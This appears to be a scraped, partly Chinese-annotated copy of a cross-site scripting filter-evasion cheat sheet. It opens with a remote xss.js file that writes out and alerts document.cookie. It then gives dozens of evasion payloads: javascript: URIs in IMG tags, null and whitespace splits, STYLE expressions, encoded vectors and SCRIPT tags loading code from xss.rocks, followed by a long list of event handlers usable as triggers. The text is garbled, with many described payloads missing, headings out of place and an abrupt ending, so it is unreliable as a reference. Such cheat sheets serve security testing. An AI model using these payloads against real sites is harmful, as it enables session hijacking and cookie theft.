/* This file is based on the file from http://ha.ckers.org/xss.js
It has been reproduced here due to the extended downtime of ha.ckers.org
This file is being hosted as a courtesy to the security community.
*/document.write("This is remote text via xss.js located at xss.rocks "+document.cookie);alert("This is remote text via xss.js located at xss.rocks "+document.cookie);
绕过大小写检查
使用VBScript绕过大小写
Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case, rendering Cross Site Scripting utilizing inline JavaScript useless. If this is the case, you may want to use VBScript since it is not a case sensitive language.
all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).
Decimal HTML character references without trailing semicolons
This is often effective in XSS that attempts to look for “&#XX;”, since most people don’t know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I’ve seen this in the wild):
Hexadecimal HTML character references without trailing semicolons
This is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).
Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:
1
<IMG SRC="jav
ascript:alert('XSS');">
Embedded carriage return to break up XSS
1
<IMG SRC="jav
ascript:alert('XSS');">
Null breaks up JavaScript directive
Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file.
1
print"<IMG SRC=java\0script:alert(\"XSS\")>";
Spaces and meta chars before the JavaScript in images for XSS
As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
1
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
Remote style sheet part 3
According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera).
STYLE attribute using a comment to break up expression
Created by Roman Ivanov
1
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
IMG STYLE with expression
This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:
IE6.0 and Netscape 8.1+ in IE rendering engine mode don’t really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:
1
<XSS STYLE="xss:expression(alert('XSS'))">
US-ASCII encoding
US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.
1
¼script¾alert(¢XSS¢)¼/script¾
META
The odd thing about meta refresh is that it doesn’t send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:
Directive URL scheme. This is nice because it also doesn’t have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding.
If the target website attempts to see if the URL contains “http://” at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):
Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes.
Firefox assumes it’s safe to close the HTML tag and add closing tags for you.
1
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
Protocol resolution in script tags
This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end.
1
<SCRIPT SRC=//xss.rocks/.j>
Half open HTML/JavaScript XSS vector
Unlike Firefox the IE rendering engine doesn’t add extra data to your page, but it does allow the javascript: directive in images.
This is useful as a vector because it doesn’t require a close angle bracket.
也可以用 <IFRAME 代替 <IMG
1
<IMG SRC="javascript:alert('XSS')"
Double open angle brackets
1
<iframe src=http://xss.rocks/scriptlet.html <
BGSOUND
1
<BGSOUND SRC="javascript:alert('XSS');">
& JavaScript includes
1
<BR SIZE="&{alert('XSS')}">
Event Handlers
FSCommand() (attacker can use this when executed from within an embedded Flash object)
onAbort() (when user aborts the loading of an image)
onActivate() (when object is set as the active element)
onAfterPrint() (activates after user prints or previews print job)
onAfterUpdate() (activates on data object after updating data in the source object)
onBeforeActivate() (fires before the object is set as the active element)
onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand(“Copy”) function)
onBeforeCut() (attacker executes the attack string right before a selection is cut)
onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand(“Paste”) function)
onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand(“Print”) function).
onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
onBeforeUpdate() (activates on data object before updating data in the source object)
onBegin() (the onbegin event fires immediately when the element’s timeline begins)
onBlur() (in the case where another popup is loaded and window looses focus)
onBounce() (fires when the behavior property of the marquee object is set to “alternate” and the contents of the marquee reach one side of the window)
onCellChange() (fires when data changes in the data provider)
onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
onClick() (someone clicks on a form)
onContextMenu() (user would need to right click on attack area)
onControlSelect() (fires when the user is about to make a control selection of the object)
onCopy() (user needs to copy something or it can be exploited using the execCommand(“Copy”) command)
onCut() (user needs to copy something or it can be exploited using the execCommand(“Cut”) command)
onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
onDataSetChanged() (fires when the data set exposed by a data source object changes)
onDataSetComplete() (fires to indicate that all data is available from the data source object)
onDblClick() (user double-clicks a form element or a link)
onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
onDrag() (requires that the user drags an object)
onDragEnd() (requires that the user drags an object)
onDragLeave() (requires that the user drags an object off a valid location)
onDragEnter() (requires that the user drags an object into a valid location)
onDragOver() (requires that the user drags an object into a valid location)
onDragDrop() (user drops an object (e.g. file) onto the browser window)
onDragStart() (occurs when user starts drag operation)
onDrop() (user drops an object (e.g. file) onto the browser window)
onEnd() (the onEnd event fires when the timeline ends.
onError() (loading of a document or image causes an error)
onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
onFilterChange() (fires when a visual filter completes state change)
onFinish() (attacker can create the exploit when marquee is finished looping)
onFocus() (attacker executes the attack string when the window gets focus)
onFocusIn() (attacker executes the attack string when window gets focus)
onFocusOut() (attacker executes the attack string when window looses focus)
onHashChange() (fires when the fragment identifier part of the document’s current address changed)
onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
onInput() (the text content of an element is changed through the user interface)
onKeyDown() (user depresses a key)
onKeyPress() (user presses or holds down a key)
onKeyUp() (user releases a key)
onLayoutComplete() (user would have to print or print preview)
onLoad() (attacker executes the attack string after the window loads)
onLoseCapture() (can be exploited by the releaseCapture() method)
onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
onMessage() (fire when the document received a message)
onMouseDown() (the attacker would need to get the user to click on an image)
onMouseEnter() (cursor moves over an object or area)
onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
onMouseMove() (the attacker would need to get the user to mouse over an image or table)
onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
onMouseOver() (cursor moves over an object or area)
onMouseUp() (the attacker would need to get the user to click on an image)
onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
onMove() (user or attacker would move the page)
onMoveEnd() (user or attacker would move the page)
onMoveStart() (user or attacker would move the page)
onOffline() (occurs if the browser is working in online mode and it starts to work offline)
onOnline() (occurs if the browser is working in offline mode and it starts to work online)
onOutOfSync() (interrupt the element’s ability to play its media as defined by the timeline)
onPaste() (user would need to paste or attacker could use the execCommand(“Paste”) function)
onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
onPopState() (fires when user navigated the session history)
onProgress() (attacker would use this as a flash movie was loading)
onPropertyChange() (user or attacker would need to change an element property)
onReadyStateChange() (user or attacker would need to change an element property)
onRedo() (user went forward in undo transaction history)
onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
onReset() (user or attacker resets a form)
onResize() (user would resize the window; attacker could auto initialize with something like: )
onResizeEnd() (user would resize the window; attacker could auto initialize with something like: )
onResizeStart() (user would resize the window; attacker could auto initialize with something like: )
onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
onRowsEnter() (user or attacker would need to change a row in a data source)
onRowExit() (user or attacker would need to change a row in a data source)
onRowDelete() (user or attacker would need to delete a row in a data source)
onRowInserted() (user or attacker would need to insert a row in a data source)
onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)
onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(“SelectAll”);)
onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(“SelectAll”);)
onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(“SelectAll”);)
onStart() (fires at the beginning of each marquee loop)
onStop() (user would need to press the stop button or leave the webpage)
onStorage() (storage area changed)
onSyncRestored() (user interrupts the element’s ability to play its media as defined by the timeline to fire)
onSubmit() (requires attacker or user submits a form)
onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
onTrackChange() (user or attacker changes track in a playList)
onUndo() (user went backward in undo transaction history)
onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
seekSegmentTime() (this is a method that locates the specified point on the element’s segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
In computing, a polyglot is a computer program or script written in a valid form of multiple programming languages, which performs the same operations or output independent of the programming language used to compile or interpret it.
